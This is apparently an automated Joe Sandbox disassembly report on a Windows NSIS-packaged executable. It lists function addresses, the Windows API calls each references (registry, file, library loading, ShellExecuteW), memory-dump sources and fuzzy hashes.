Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 0040638E Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
Instruction ID: 49947657582026fbe4aef0e17b19bc3bf563a4cedc03dc09487ed5c70e3121f8
Opcode Fuzzy Hash: 98db82277cbd4352b69e460ef64f3ecb5600990b2ef5c94e446350a59e262d17
Instruction Fuzzy Hash: B521C871904215F6CF206F95CE48A9E7AB0AB09354F70427BF610B51E0D7B94D41DA6E

Function 00401B22 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401B92
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4

Strings

Call, xrefs: 00401B49, 00401B4F, 00401B69

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
Instruction ID: 832337492cf7a06c21e2abca279de06bf1a27b56728bc0a7368b5bd0ba670fc7
Opcode Fuzzy Hash: 82b143ca76a0ad2aa6951e2f71a1959c71fa5a87b6969dabeb77a470a6be7f14
Instruction Fuzzy Hash: 2321D2B2604101ABCB10DBA4DE8495FB3A8EB49314B24093BF581F33D1D778A8419FAD

Function 0040219E Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040622B: FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406236
Part of subcall function 0040622B: FindClose.KERNEL32(00000000), ref: 00406242

lstrlenW.KERNEL32 ref: 004021DE
lstrlenW.KERNEL32(00000000), ref: 004021E9
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402212

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
Instruction ID: 6bed8099c30f558e68629b23c483ae923e88bf7bf978b8bddb761e1df3150e64
Opcode Fuzzy Hash: 5cc1749332b3b57a91ff7d25110549ce89a1fa95ab6080c74ad5ba30b4e2b3c6
Instruction Fuzzy Hash: 8C115271D10214A6CB10EFF9C949A9FB7B8EF14314F20843BB511FB2D5D6B899418B59

Function 00402452 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
Instruction ID: 196cef28da363d1279e483bf9a38a563a29f189f24dbcf66659da751fa440e39
Opcode Fuzzy Hash: 4da3ee374b122c8e44559765249fc7571a9c31b0770631e970d664ec90db9a39
Instruction Fuzzy Hash: 87F0D1B1A04205ABE7108F65DE88ABF766CEF40358F60443EF405B21C0D6B85D419B6A

Function 00401DF3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\Uploadable\normallnnens\Trskelen,?), ref: 00401E3D

Strings

C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 00401E26

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\Uploadable\normallnnens\Trskelen
API String ID: 587946157-936114887
Opcode ID: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
Instruction ID: 3f653c9cfcf7a787dcf128efd04e0ef48ce3664fdda10e2cbb7d118b60988be6
Opcode Fuzzy Hash: b4fa3ccfc6d2602821902305855c69e2ef6e96ab6c2ad06ce8c4c20b50c86f6d
Instruction Fuzzy Hash: 5EF0F675B54200ABDB006FB5DD4AE9E33B8AB24715F600937F401F70D1D6FC88419629

Function 10002870 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 1000292F
GetLastError.KERNEL32 ref: 10002A36

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
Instruction ID: 1e4ae0ab9f7d80da0c6c18ef4be67b5a8e29914e0a0cef2da75b429278759b76
Opcode Fuzzy Hash: 25ba90756ec787877d4bf69bcc9f708461c4247993a7c98eb6ee1d719eb9b926
Instruction Fuzzy Hash: C651A4BA805214DFFB10EF64DCC2B5937A4EB443D4F22842AEA04D722DCF34A994CB95

Function 004023DE Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,0000028F,00000000,00000022,00000000,?,?), ref: 00402C6A

RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
Instruction ID: 6c75ae994a47700371a60e183d9c6493363f31bd6906e7075ff81e32be465fed
Opcode Fuzzy Hash: 3741444217745918fa209080425cf8965bc832662536b474c8528d3afa2b0d60
Instruction Fuzzy Hash: 6E11A071914205EEDB14CFA1DA585AFB7B4EF04358F60843FE042B72D0D6B85A41DB2A

Function 00405A3B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\u9aPQQIwhj.exe"), ref: 00405A94
GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,74DF2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405AA4

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID:
API String ID: 3248276644-0
Opcode ID: 24ca669ab47e35d23b43d4bfaad095a7b1b39ed0889c711e0d8ed794351f313e
